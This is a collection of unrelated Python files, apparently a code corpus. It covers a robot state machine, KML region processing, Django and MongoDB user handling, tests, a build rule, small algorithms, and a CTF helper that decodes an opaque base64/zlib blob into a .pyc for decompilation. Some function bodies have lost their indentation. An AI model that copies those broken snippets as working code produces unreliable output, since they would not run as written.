    stream.write(str(excType))
    stream.write(": ")
    stream.write(str(excValue))
    stream.write("\n\n")
    frames = stackToList(excTB)
    if withLocals:
        stream.write("Traceback (most recent call first):\n")
    else:
        # Match the interpreter's conventional ordering.
        stream.write("Traceback (most recent call last):\n")
        frames.reverse()
    for frame in frames:
        formatCode(frame, stream)
        if withLocals:
            formatLocals(frame, stream)
            stream.write(" %s\n\n" % ("*" * 70))
|
python
|
from magicbot import StateMachine, state, timed_state
from components.cargo import CargoManipulator, Height
from components.vision import Vision
class CargoManager(StateMachine):
    """State machine sequencing the cargo manipulator: move to a target
    height, run the intake/outtake, and switch vision modes accordingly."""
    # Injected by magicbot.
    cargo_component: CargoManipulator
    vision: Vision
    def on_disable(self):
        # Stop motors and return to a safe height whenever the robot disables.
        self.done()
    def intake_floor(self, force=False):
        self.engage(initial_state="move_to_floor", force=force)
    @state(first=True, must_finish=True)
    def move_to_floor(self, initial_call, state_tm):
        # NOTE(review): transitions immediately without waiting for
        # at_height(), unlike move_to_cargo_ship -- intake starts while
        # the arm is still travelling; confirm this is intentional.
        self.cargo_component.move_to(Height.FLOOR)
        self.cargo_component.intake()
        self.next_state("intaking_cargo")
    def outake_cargo_ship(self, force=False):
        self.engage(initial_state="move_to_cargo_ship", force=force)
    @state(must_finish=True)
    def move_to_cargo_ship(self, initial_call, state_tm):
        self.cargo_component.move_to(Height.CARGO_SHIP)
        if self.cargo_component.at_height(Height.CARGO_SHIP):
            self.next_state("outtaking_cargo")
    def intake_loading(self, force=False):
        self.engage(initial_state="move_to_loading_station", force=force)
    @state(must_finish=True)
    def move_to_loading_station(self, initial_call, state_tm):
        self.cargo_component.move_to(Height.LOADING_STATION)
        self.cargo_component.intake()
        self.next_state("intaking_cargo")
    @state(must_finish=True)
    def intaking_cargo(self):
        # Use cargo vision while hunting for a ball; hatch targets are
        # restored once the cargo is ejected (see outtaking_cargo).
        self.vision.use_cargo()
        if self.cargo_component.is_contained():
            self.next_state("finishing_intake")
        else:
            self.cargo_component.intake()
    @state(must_finish=True)
    def outtaking_cargo(self, initial_call, state_tm):
        self.cargo_component.outtake()
        if state_tm > 0.5:
            # Half a second of outtake is treated as a completed eject.
            self.vision.use_hatch()
            self.done()
    @timed_state(duration=1)
    def finishing_intake(self):
        # Pull gently for one second so the ball seats fully.
        self.cargo_component.slow_intake()
    def done(self):
        self.cargo_component.stop()
        self.cargo_component.move_to(Height.LOADING_STATION)
        super().done()
|
python
|
import os
import pandas
import geopandas
from shapely.geometry import Polygon, LineString
from shared import print_
# Teach fiona (geopandas' file backend) to read and write KML files.
geopandas.io.file.fiona.drvsupport.supported_drivers["KML"] = "rw"
# Columns stripped from the input data before writing the output.
COLUMNS_TO_DROP = ["Description"]
def generate_regions(**kwargs):
    """Build a regions GeoDataFrame from KML inputs and write it out.

    Expected kwargs: 'inputs' (directory containing .kml files) and
    'output' (path accepted by GeoDataFrame.to_file).
    """
    print_("GENERATE REGIONS", title=True)
    print_("Parameters", section=True)
    print_(kwargs)
    regions = _read_data(kwargs["inputs"])
    regions = _drop_unnecessary_columns(regions)
    regions = _columns_to_lowercase(regions)
    print_("Info", section=True)
    print_(regions.crs)
    print_(regions.info())
    print_("Preview", section=True)
    print_(regions.head(10))
    regions.to_file(kwargs["output"])
def _read_data(inputs):
    """Read every .kml file under *inputs* into one region-per-row frame.

    Each file becomes one region named after the file; all geometry points
    in a file are collapsed into a single Polygon.
    """
    data = geopandas.GeoDataFrame()
    for _, __, files in os.walk(inputs):
        for fname in files:
            if not fname.lower().endswith(".kml"):
                continue
            # NOTE(review): assumes *inputs* ends with a path separator.
            data_new = geopandas.read_file(f"{inputs}{fname}", driver="KML")
            data_new["region"] = fname.replace(".kml", "").replace(".KML", "")
            if "boundary" in fname:
                # new = data_new.groupby("region").apply(_to_line)
                # NOTE(review): both branches build polygons; the LineString
                # variant for boundary files is deliberately disabled above.
                new = data_new.groupby("region").apply(_to_polygon)
            else:
                new = data_new.groupby("region").apply(_to_polygon)
            data = pandas.concat([data, new.reset_index()], ignore_index=True)
    data.columns = ["region", "geometry"]
    # NOTE(review): the {"init": ...} CRS form is deprecated in newer
    # pyproj/geopandas; "EPSG:4326" alone is the modern spelling.
    return geopandas.GeoDataFrame(data, crs={"init": "EPSG:4326"})
def _to_line(x):
    """Collapse a group's geometry points into a single LineString."""
    return _to_shape(LineString, x)
def _to_polygon(x):
    """Collapse a group's geometry points into a single Polygon."""
    return _to_shape(Polygon, x)
def _to_shape(shape, x):
return shape([p.x, p.y] for p in x["geometry"].tolist())
def _drop_unnecessary_columns(data):
    """Drop (in place) every COLUMNS_TO_DROP column present in *data*."""
    present = [name for name in COLUMNS_TO_DROP if name in list(data.columns)]
    for column in present:
        data.drop(columns=column, inplace=True)
    return data
def _columns_to_lowercase(data):
data.columns = [c.lower() for c in list(data.columns)]
return data
|
python
|
# -*- coding: utf-8 -*-
import unittest
from copy import deepcopy
from openregistry.lots.core.tests.base import snitch
from openregistry.lots.bargain.tests.base import (
LotContentWebTest
)
from openregistry.lots.core.tests.blanks.json_data import test_loki_item_data
from openregistry.lots.bargain.tests.blanks.item_blanks import (
create_item_resource,
patch_item,
update_items_in_forbidden,
list_item_resource,
patch_items_with_lot
)
from openregistry.lots.bargain.constants import LOT_STATUSES
class LotItemResourceTest(LotContentWebTest):
    """Lot item sub-resource tests; the bodies come from shared blank
    functions bound in as test methods via snitch()."""
    initial_item_data = deepcopy(test_loki_item_data)
    test_create_item_resource = snitch(create_item_resource)
    test_patch_item_resource = snitch(patch_item)
    test_list_item_resource = snitch(list_item_resource)
    test_update_items_in_forbidden = snitch(update_items_in_forbidden)
    test_patch_items_with_lot = snitch(patch_items_with_lot)
    # Items are editable only while the lot is in draft/composing/pending.
    forbidden_item_statuses_modification = list(set(LOT_STATUSES) - {'draft', 'composing', 'pending'})
def suite():
    """Assemble the item-resource test cases into a single TestSuite."""
    tests = unittest.TestSuite()
    tests.addTest(unittest.makeSuite(LotItemResourceTest))
    return tests
if __name__ == '__main__':
    # Allow running this module directly; executes suite() above.
    unittest.main(defaultTest='suite')
|
python
|
# -*- coding: utf-8 -*-
import re
from datetime import timedelta
from django.contrib.auth.models import Group
from django.contrib.auth import authenticate
from django.core.validators import EMPTY_VALUES
from django.db.models import Q
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from rest_framework import exceptions, serializers
from rest_framework.response import Response
from foundation.models import User
from foundation.custom.drf.validation import MatchingDuelFieldsValidator, EnhancedPasswordStrengthFieldValidator
class ResetPasswordSerializer(serializers.Serializer):
    """Validates a password-reset submission: a new password entered twice
    plus the one-time reset access code identifying the user."""
    password = serializers.CharField(
        required=True,
        allow_blank=False,
        max_length=63,
        style={'input_type': 'password'},
        validators = [
            MatchingDuelFieldsValidator(
                another_field='password_repeat',
                message=_("Inputted passwords fields do not match.")
            ),
            EnhancedPasswordStrengthFieldValidator()
        ]
    )
    # Must equal 'password' (enforced by MatchingDuelFieldsValidator above).
    password_repeat = serializers.CharField(
        required=True,
        allow_blank=False,
        max_length=63,
        style={'input_type': 'password'}
    )
    # One-time password-reset access code issued to the user.
    pr_access_code = serializers.CharField(
        required=True,
        allow_blank=False,
        max_length=255,
        style={'input_type': 'password'}
    )
    def validate(self, clean_data):
        """Resolve pr_access_code to a User; attaches it as clean_data['me']."""
        pr_access_code = clean_data['pr_access_code']
        try:
            # Lookup fails if the code was never issued or has been cleared.
            clean_data['me'] = User.objects.get(pr_access_code=pr_access_code)
        except User.DoesNotExist:
            raise serializers.ValidationError(_("Password reset access code does not exist."))
        return clean_data
|
python
|
import unittest
from tests.refactor.utils import RefactorTestCase
from unimport.constants import PY38_PLUS
class TypingTestCase(RefactorTestCase):
    """Refactor tests asserting that ``typing`` imports referenced only from
    type comments or string annotations are treated as used (not removed)."""
    include_star_import = True
    @unittest.skipIf(
        not PY38_PLUS, "This feature is only available for python 3.8."
    )
    def test_type_comments(self):
        # Names used only in a function type comment still count as used.
        self.assertActionAfterRefactorEqualToAction(
            """\
from typing import Any
from typing import Tuple
from typing import Union
def function(a, b):
    # type: (Any, str) -> Union[Tuple[None, None], Tuple[str, str]]
    pass
"""
        )
    @unittest.skipIf(
        not PY38_PLUS, "This feature is only available for python 3.8."
    )
    def test_type_comments_with_variable(self):
        self.assertActionAfterRefactorEqualToAction(
            """\
from typing import List
test_variable = [2] # type: List[int]
"""
        )
    @unittest.skipIf(
        not PY38_PLUS, "This feature is only available for python 3.8."
    )
    def test_type_comment_params(self):
        self.assertActionAfterRefactorEqualToAction(
            """\
from typing import List
def x(
    f: # type:List,
    r: # type:str
):
    pass
"""
        )
    @unittest.skipIf(
        not PY38_PLUS, "This feature is only available for python 3.8."
    )
    def test_type_comment_funcdef(self):
        self.assertActionAfterRefactorEqualToAction(
            """\
from typing import List
def x(y):
    # type: (str) -> List[str]
    pass
"""
        )
    def test_variable(self):
        # String annotations keep their imports, too.
        self.assertActionAfterRefactorEqualToAction(
            """\
from typing import Dict, List
test: "List[Dict]"
"""
        )
    def test_function_arg(self):
        self.assertActionAfterRefactorEqualToAction(
            """\
from typing import Dict, List
def test(arg:"List[Dict]") -> None:
    pass
"""
        )
    def test_function_str_arg(self):
        # NOTE(review): 'pas' below looks like a typo for 'pass', but it
        # still parses (as a bare name expression), so the fixture is valid.
        self.assertActionAfterRefactorEqualToAction(
            """\
from typing import Dict, Literal
def test(item, when: "Literal['Dict']") -> None:
    pas
"""
        )
    def test_function_return(self):
        self.assertActionAfterRefactorEqualToAction(
            """\
from typing import Dict, List
def test(arg: list) -> "List[Dict]":
    pass
"""
        )
|
python
|
# Copyright 2012 Google Inc. All Rights Reserved.
"""Simulator state rules for the build system.
Contains the following rules:
compile_simstate
"""
__author__ = '[email protected] (Ben Vanik)'
import io
import json
import os
import sys
import anvil.async
from anvil.context import RuleContext
from anvil.rule import Rule, build_rule
from anvil.task import Task, MakoTemplateTask
import anvil.util
# Enable importing local modules
sys.path.append(anvil.util.get_script_path())
def _get_template_paths():
  """Return the path to the simstate JS Mako template.

  NOTE(review): despite the parentheses, the return value is a bare
  string, not a 1-tuple; callers "unpack" it with the same parenthesized
  assignment, which simply binds the string.
  """
  template_dir = os.path.join(anvil.util.get_script_path(), 'templates')
  return (os.path.join(template_dir, 'simstate_js.mako'))
# Maps .simstate JSON type names to code-generation metadata:
#   name: type name echoed into generated code
#   is_primitive: compared/assigned by value (no compare_fn/setter_fn)
#   closure_type: Closure compiler type annotation
#   default_value: JS expression used to initialize the variable
#   compare_fn/setter_fn: JS helpers for non-primitive types
#   extra_args: extra JSON keys forwarded to the generated variable ctor
SIM_TYPES_ = {
    'Integer': {
        'name': 'Integer',
        'is_primitive': True,
        'closure_type': 'number',
        'default_value': '0',
        },
    'Float': {
        'name': 'Float',
        'is_primitive': True,
        'closure_type': 'number',
        'default_value': '0',
        },
    'Vec3': {
        'name': 'Vec3',
        'is_primitive': False,
        'closure_type': 'goog.vec.Vec3.Float32',
        'default_value': 'goog.vec.Vec3.createFloat32()',
        'compare_fn': 'goog.vec.Vec3.equals',
        'setter_fn': 'goog.vec.Vec3.setFromArray',
        },
    'Quaternion': {
        'name': 'Quaternion',
        'is_primitive': False,
        'closure_type': 'goog.vec.Quaternion.Float32',
        'default_value': 'goog.vec.Quaternion.createFloat32()',
        # Quaternions compare as plain Vec4s.
        'compare_fn': 'goog.vec.Vec4.equals',
        'setter_fn': 'goog.vec.Quaternion.setFromArray',
        'extra_args': ['normalized',],
        },
    'Color': {
        'name': 'Color',
        'is_primitive': True,
        'closure_type': 'number',
        # 32-bit packed ARGB/RGBA color.
        'default_value': '0x00000000',
        },
    'String': {
        'name': 'String',
        'is_primitive': True,
        'closure_type': 'string',
        'default_value': '\'\'',
        },
    'EntityID': {
        'name': 'EntityID',
        'is_primitive': True,
        'closure_type': 'number',
        'default_value': 'gf.sim.NO_ENTITY_ID',
        },
    'UserID': {
        'name': 'UserID',
        'is_primitive': True,
        'closure_type': 'string',
        'default_value': '\'\'',
        },
    }
class SimVar(object):
  """A single simulation state variable parsed from a .simstate JSON entry.
  """

  def __init__(self, json, *args, **kwargs):
    """Initializes a sim state variable from the given JSON dict.
    Args:
      json: JSON dict describing the variable.
    """
    super(SimVar, self).__init__(*args, **kwargs)
    self.json = json
    self.name = json['name']
    # Capitalized name, used for generated getter/setter identifiers.
    self.cap_name = self.name[0:1].capitalize() + self.name[1:]
    self.type = SIM_TYPES_[json['type']]
    self.entity_type = json.get('entity_type', None)
    self.flags = self._parse_flags(json.get('flags', []))
    self.onchange = json.get('onchange', '')
    # Render extra constructor arguments declared by the type, as a
    # comma-separated JS argument string.
    arg_strs = []
    for arg_name in self.type.get('extra_args', None) or []:
      value = json.get(arg_name, 'undefined')
      if value == True:
        value = 'true'
      elif value == False:
        value = 'false'
      arg_strs.append(value)
    self.extra_args = ', '.join(arg_strs)

  def _parse_flags(self, flags):
    """Parses a list of string flags and returns a string bitmask.
    Args:
      flags: A list of string flags.
    Returns:
      A string containing a bitmask of the given flags ('0' when empty).
    """
    if not flags:
      return '0'
    return ' | '.join('gf.sim.VariableFlag.%s' % (flag,) for flag in flags)
class SimState(object):
  """Parsed sim state model: a named state with a superclass and variables.
  """

  def __init__(self, src_path, json, *args, **kwargs):
    """Initializes a sim state model from the given JSON dict.
    Args:
      src_path: Source file path (kept for diagnostics).
      json: JSON dict with 'name', 'super' and a 'vars' list.
    """
    super(SimState, self).__init__(*args, **kwargs)
    self.src_path = src_path
    self.json = json
    self.name = json['name']
    self.super = json['super']
    # Each entry in 'vars' becomes a SimVar model object.
    self.vars = [SimVar(json_var) for json_var in json['vars']]
@build_rule('compile_simstate')
class CompileSimStateRule(Rule):
  """Sim state file compilation and code gen rule.
  Will parse and generate simstate (.simstate) files.
  Each input sim state translates to exactly one .js file.
  Inputs:
    srcs: All source simstate files.
  Outputs:
    A .js file for each input file.
  """
  def __init__(self, name, *args, **kwargs):
    """Initializes a sim state compilation rule.
    Args:
      srcs: All source simstate files.
    """
    super(CompileSimStateRule, self).__init__(name, *args, **kwargs)
    # NOTE: _get_template_paths() returns a bare string (its parenthesized
    # return is not a tuple), so this binds the template path itself.
    (js_template) = _get_template_paths()
    self._append_dependent_paths([
        js_template])
  class _Context(RuleContext):
    def begin(self):
      # Parse each .simstate source and spawn one Mako codegen task per file.
      super(CompileSimStateRule._Context, self).begin()
      (js_template) = _get_template_paths()
      ds = []
      for src_path in self.src_paths:
        # foo.simstate -> <gen>/foostate.js
        js_path = os.path.splitext(self._get_gen_path_for_src(src_path))[0]
        js_path += 'state.js'
        self._ensure_output_exists(os.path.dirname(js_path))
        self._append_output_paths([js_path])
        # TODO(benvanik): move parsing to another task
        with io.open(src_path) as f:
          file_str = f.read()
          simstate_json = json.loads(file_str)
          simstate = SimState(src_path, simstate_json)
          ds.append(self._run_task_async(MakoTemplateTask(
              self.build_env, js_path, js_template, {
                  'state': simstate,
                  })))
      # Kick off optimizations
      dg = anvil.async.gather_deferreds(ds, errback_if_any_fail=True)
      self._chain(dg)
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 14 14:32:57 2020
@author: Administrator
"""
"""
回文字符串是指一个字符串从左到右与从右到左遍历得到的序列是相同的.例如"abcba"就是回文字符串,而"abcab"则不是回文字符串.
"""
def AddSym2Str(s):
    """Interleave '*' separators around every character.

    "ab" -> "*a*b*", "" -> "*". The separators make every palindrome in
    the augmented string odd-length, so a single center-expansion pass
    finds both odd and even palindromes of the original.

    Fix: the original recursive implementation was O(n^2) in string
    concatenation and hit Python's recursion limit on long inputs; this
    iterative join is equivalent and linear.
    """
    return '*' + ''.join(c + '*' for c in s)


def GetPalLen(i, s):
    """Expand around center i in s.

    Returns (length, substring) of the longest palindrome centered at
    index i, where length = 2 * (expansion steps) - 1.
    """
    lens = 0
    j = 0
    tmp = ''
    while (i - j >= 0) and (i + j < len(s)) and (s[i - j] == s[i + j]):
        if j == 0:
            tmp = s[i]
        else:
            tmp = s[i - j] + tmp + s[i + j]
        lens += 1
        j += 1
    return (2 * lens - 1), tmp


def GetLongestPalStr(s):
    """Return (per-center palindrome lengths, longest palindrome).

    The returned string still contains the '*' separators inserted by
    AddSym2Str; strip them with .replace("*", "") for the plain answer.

    Fix: the original evaluated max(p) inside the loop, making the scan
    accidentally O(n^2); a running maximum preserves the exact same
    result (first occurrence of the maximum wins) in O(n) comparisons.
    """
    s = AddSym2Str(s)
    p = []
    strlongest = ''
    best_len = -1  # running maximum of lengths seen so far
    for i in range(len(s)):
        tmplen, tmpstr = GetPalLen(i, s)
        if tmplen > best_len:
            best_len = tmplen
            strlongest = tmpstr
        p.append(tmplen)
    return p, strlongest


if __name__ == "__main__":
    s = "abcdefgfedxyz"
    p, strlongest = GetLongestPalStr(s)
    strlongest = strlongest.replace("*", "")
    print("The longest palindrome string is : ", strlongest)
    print("The longest length is : ", int((max(p) - 1) / 2))
|
python
|
from bson import ObjectId
from db.db import Database
from db.security import crypt
import datetime
class Users(Database):
    """CRUD repository for user documents in the `users` collection.

    All stored field values are passed through crypt() first; presumably a
    deterministic transformation, since list_user() matches on crypt(cpf) —
    TODO confirm against db.security.crypt.
    """
    # Declared attribute types; the value attributes are populated by
    # create_user() before insert_user() is called.
    _id: str
    name: str
    cpf: str
    email: str
    phone_number: int
    created_at: str
    updated_at: str
    def __init__(self):
        super().__init__()
    def create_user(self, user_data: dict):
        """Encrypt user_data fields onto self; returns True on success."""
        try:
            self.name = crypt(user_data["name"])
            self.cpf = crypt(user_data["cpf"])
            self.email = crypt(user_data["email"])
            self.phone_number = crypt(user_data["phone_number"])
            return True
        except Exception as erro:
            # Best-effort: log and signal failure instead of raising.
            print(str(erro))
            return False
    def insert_user(self) -> bool:
        """Insert the fields prepared by create_user() as a new document."""
        try:
            self.users.insert_one({'name': self.name,
                                   'cpf': self.cpf,
                                   'email': self.email,
                                   'phone_number': self.phone_number,
                                   'created_at': str(datetime.datetime.now().strftime("%d-%m-%Y")),
                                   'updated_at': str(datetime.datetime.now().strftime("%d-%m-%Y %H:%M:%S"))})
            return True
        except Exception as erro:
            print(str(erro))
            return False
    def list_all_users(self):
        """Return a cursor over every user document."""
        return self.users.find({})
    def list_user(self, cpf: str):
        """Return a cursor over documents whose cpf matches crypt(cpf)."""
        return self.users.find({'cpf': crypt(cpf)})
    def delete_user(self, cpf: str) -> bool:
        """Delete the user matching cpf; returns False on any error.

        NOTE(review): if no user matches, generate_data_users() raises
        NameError (see below), which is caught here and reported as False.
        """
        try:
            db_data = self.list_user(cpf)
            user_to_delete = self.generate_data_users(db_data)
            user_to_delete['id'] = ObjectId(user_to_delete['id'])
            self.users.delete_one({"_id": user_to_delete['id']})
        except Exception as erro:
            print(str(erro))
            return False
        return True
    def update_user(self, cpf: str, new_user_data: dict) -> bool:
        """Replace the matched user's fields, preserving _id/created_at."""
        db_data = self.list_user(cpf)
        old_user_data = self.generate_data_users(db_data)
        new_user_data = self.convert_user_data(new_user_data)
        new_user_data['_id'] = ObjectId(old_user_data['id'])
        new_user_data['created_at'] = old_user_data['created_at']
        new_user_data['updated_at'] = str(datetime.datetime.now().strftime("%d-%m-%Y %H:%M:%S"))
        self.users.update_one({"_id": new_user_data['_id']}, {"$set": new_user_data})
        return True
    def convert_user_data(self, user_data: dict) -> dict:
        """Encrypt the mutable fields of user_data for storage."""
        new_user_data = {'name': crypt(user_data['name']), 'cpf': crypt(user_data['cpf']),
                         'email': crypt(user_data['email']), 'phone_number': crypt(user_data['phone_number'])}
        return new_user_data
    def generate_data_users(self, user_data: list) -> dict:
        """Flatten a cursor into a plain dict.

        NOTE(review): iterates the whole cursor and returns only the LAST
        matching document; with an empty cursor, user_dict is never bound
        and the return raises NameError. Callers appear to rely on the
        single-match case — confirm.
        """
        for user in user_data:
            user_dict = ({'id': str(user['_id']),
                          'name': user['name'],
                          'cpf': user['cpf'],
                          'email': user['email'],
                          'phone_number': user['phone_number'],
                          'created_at': user['created_at'],
                          'updated_at': user['updated_at']})
        return user_dict
|
python
|
# Build Pascal's triangle as a dict keyed by (n, r) for n = 2..100
# (seeded with (1, 1)), then count how many entries exceed one million.
binomski_slovar = {(1, 1): 1}
for n in range(2, 101):
    binomski_slovar[(n, 0)] = 1
    binomski_slovar[(n, 1)] = n
    for r in range(2, n + 1):
        if r == n:
            # Edge of the triangle: C(n, n) carried down from C(n-1, n-1).
            binomski_slovar[(n, r)] = binomski_slovar[(n - 1, r - 1)]
        else:
            # Pascal's rule: C(n, r) = C(n-1, r) + C(n-1, r-1).
            binomski_slovar[(n, r)] = (binomski_slovar[(n - 1, r)]
                                       + binomski_slovar[(n - 1, r - 1)])
stevilo_vecjih_od_milijon = sum(1 for v in binomski_slovar.values() if v > 10 ** 6)
|
python
|
# -*- coding: utf-8 -*-
'''
@Time : 4/20/2022 4:36 PM
@Author : dong.yachao
'''
|
python
|
'''Crie uma classe para implementar uma conta corrente.
A classe deve possuir os seguintes atributos: número da conta,
nome do correntista e saldo. Os métodos são os seguintes:
alterarNome, depósito e saque; No construtor, saldo é opcional,
com valor default zero e os demais atributos são obrigatórios.'''
class ContaCorrente:
    """Checking account: account number, holder name and balance.

    Per the exercise statement, saldo is optional (default 0) and the
    other attributes come from the caller.
    """

    def __init__(self, conta="", correntista="", saldo=0):
        self.conta = conta              # account number
        self.correntista = correntista  # holder name
        self.saldo = saldo              # balance, defaults to zero

    def alterar_nome(self, nome):
        """Rename the holder and return the new name.

        Bug fix: the original called str.replace(nome) (TypeError —
        str.replace requires two arguments) and ignored that strings are
        immutable; plain assignment is the correct behavior.
        """
        self.correntista = nome
        return self.correntista

    def fazer_deposito(self, valor=0):
        """Add `valor` to the balance and return the new balance.

        Bug fix: the original returned the account number and deposited
        nothing. The default of 0 keeps legacy no-argument calls working.
        """
        self.saldo += valor
        return self.saldo

    def fazer_saque(self, valor=0):
        """Withdraw `valor` if funds allow and return the balance.

        Insufficient (or negative) amounts leave the balance unchanged —
        best-effort, mirroring the original's non-raising behavior. The
        default of 0 keeps legacy no-argument calls working.
        """
        if 0 <= valor <= self.saldo:
            self.saldo -= valor
        return self.saldo
# NOTE(review): two separate accounts are created here — `c` stores the
# holder NAME in the `conta` slot and `cont` stores the account number;
# neither instance carries both values, and the results of the calls are
# discarded. Likely the intent was a single
# ContaCorrente(conta, correntista) — confirm with the author.
correntista = input('Digite o nome do correntista: ')
conta = int(input("Digite o número da conta: "))
c = ContaCorrente(correntista)
cont = ContaCorrente(conta)
c.alterar_nome("")
cont.fazer_deposito()
|
python
|
from dataclasses import dataclass
from bindings.csw.abstract_coordinate_system_type import AbstractCoordinateSystemType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class ObliqueCartesianCstype(AbstractCoordinateSystemType):
    """A two- or three-dimensional coordinate system with straight axes that
    are not necessarily orthogonal.
    An ObliqueCartesianCS shall have two or three usesAxis associations.
    """
    class Meta:
        # xsdata binding metadata: maps this class to the GML schema type
        # name (the Python class name differs only in capitalization).
        name = "ObliqueCartesianCSType"
|
python
|
from dataclasses import dataclass, field
from typing import Optional
from serde import deserialize
from metaphor.common.filter import DatasetFilter
from metaphor.snowflake.auth import SnowflakeAuthConfig
from metaphor.snowflake.utils import DEFAULT_THREAD_POOL_SIZE
@deserialize
@dataclass
class SnowflakeRunConfig(SnowflakeAuthConfig):
    """Run configuration for the Snowflake connector (extends auth config)."""
    # Include or exclude specific databases/schemas/tables.
    # default_factory avoids sharing one DatasetFilter across instances.
    filter: Optional[DatasetFilter] = field(default_factory=lambda: DatasetFilter())
    # Max number of concurrent queries to database
    max_concurrency: Optional[int] = DEFAULT_THREAD_POOL_SIZE
|
python
|
# -*- coding: utf-8 -*-
#####################################################################
# Peach - Python para Inteligência Computacional
# José Alexandre Nalon
#
# Este arquivo: demo07.py
# Demonstração e teste, Mapeamento de uma função não linear.
#####################################################################
from numpy import *
import random
import peach as p
# About this demo:
#
# A neural network can be used to map a nonlinear function such as a
# sinusoid. The technique requires a more complex network: a single
# logical input, but a relatively large hidden layer. The output layer
# uses the identity activation so that it sums the partial mappings.
# Create the neural network. The activation functions are sigmoid
# (hidden layer) and identity (output layer); learning is
# back-propagation (the default rule).
# Several outputs, evenly distributed around the evaluation point, are
# used so the obtained error is more significant where it exists. The
# evaluation point is int(inputs/2); a wider neighborhood gives better
# results.
inputs = 7
nn = p.FeedForward((inputs, 200, inputs), lrule=p.BackPropagation(0.01), bias=True)
nn.phi = (p.Sigmoid, p.Linear)
delta = linspace(-0.1, 0.1, inputs)
elog = [ ]
error = 1
i = 0
while i < 2000:
    # Draw a random x and the desired response. From x we build xo, the
    # neighborhood vector fed to the network.
    xo = random.uniform(-1.0, 1.0)
    x = xo + delta
    d = sin(pi*x)
    # Predict, compute the error and perform one learning step.
    y = nn(x)
    error = nn.learn(x, d)
    elog.append(error)
    # Increment the attempt counter.
    i = i + 1
# If matplotlib is installed, plot the original function against the
# network's prediction and the error log, saving to demo07.eps.
try:
    from matplotlib import *
    from matplotlib.pylab import *
    x = linspace(-1, 1, 200)
    y = sin(pi*x)
    ye = [ ]
    for xo in x:
        # Evaluate the network on the neighborhood of xo; keep only the
        # center output (index int(inputs/2)).
        yn = nn(delta + xo)
        ye.append(yn[int(inputs/2)])
    ye = array(ye)
    subplot(211)
    # NOTE(review): pylab hold() was removed in matplotlib >= 3.0 — this
    # line raises NameError/AttributeError there; confirm the pinned
    # matplotlib version.
    hold(True)
    grid(True)
    plot(x, y, 'b--')
    plot(x, ye, 'g')
    xlim([ -1, 1 ])
    legend([ "$y$", "$\hat{y}$" ])
    subplot(212)
    grid(True)
    plot(arange(0, 2000, 10), array(elog, dtype=float)[::10])
    savefig("demo07.eps")
except ImportError:
    pass
|
python
|
from django.conf.urls import url
from .import views
from django.conf import settings
from django.conf.urls.static import static
# URL routes for the team-lead section of the app; every route maps a
# regex path to the matching view in views.py, named for use with
# {% url %} / reverse().
# NOTE(review): django.conf.urls.url() is a deprecated alias of re_path()
# and was removed in Django 4.0 — migrate to django.urls.re_path (or
# path()) when upgrading.
urlpatterns = [
    url(r'^$', views.home_teamlead),
    url(r'^index_teamlead$', views.index_teamlead, name='index_teamlead'),
    url(r'^holidays_teamlead$', views.holidays_teamlead, name='holidays_teamlead'),
    url(r'^attendance_teamlead$', views.attendance_teamlead, name='attendance_teamlead'),
    url(r'^salary_teamlead$', views.salary_teamlead, name='salary_teamlead'),
    url(r'^salaryview_teamlead$', views.salaryview_teamlead, name='salaryview_teamlead'),
    url(r'^profile_teamlead$', views.profile_teamlead, name='profile_teamlead'),
    url(r'^editprofile_teamlead$', views.editprofile_teamlead, name='editprofile_teamlead'),
    url(r'^compose_teamlead$', views.compose_teamlead, name='compose_teamlead'),
    url(r'^changepwd_teamlead$', views.changepwd_teamlead, name='changepwd_teamlead'),
    url(r'^leavesRequest_teamlead$', views.leave_teamlead, name='leave_teamlead'),
    url(r'^mailview_teamlead$', views.mailview_teamlead, name='mailview_teamlead'),
    url(r'^employee_teamlead$', views.employee_teamlead, name='employee_teamlead'),
]
|
python
|
from base64 import b64decode
from zlib import decompress
from os import system
# CTF helper: reconstruct a .pyc from an embedded zlib+base64 payload,
# decompile it with uncompyle6, then replay the LOAD_CONST/ROT_TWO/
# BINARY_ADD bytecode listing below to recover the hidden string.
inputFile = "handcrafted-pyc.py_bc552f58fe2709225ca0768c131dd14934a47305"
# Python 2.7 pyc magic number + timestamp, prepended to the code object.
magicHeader = b"\x03\xf3\x0d\x0a\xfb\x1c\x32\x59"
outputPycFile = "dump.pyc"
outputSrcFile = "output.py"
uncompyleExe = "uncompyle6"
code = 'eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux' \
'+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU' \
'3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMru' \
'ckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2' \
'JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfq' \
'mQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5' \
'HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4A' \
'VAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe' \
'/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ== '
# Decode and decompress the embedded payload into raw marshalled code.
content = decompress(b64decode(code))
# NOTE(review): prefer `with open(...)` for automatic closing.
file = open(outputPycFile, 'wb')
data = magicHeader + content
file.write(data)
file.close()
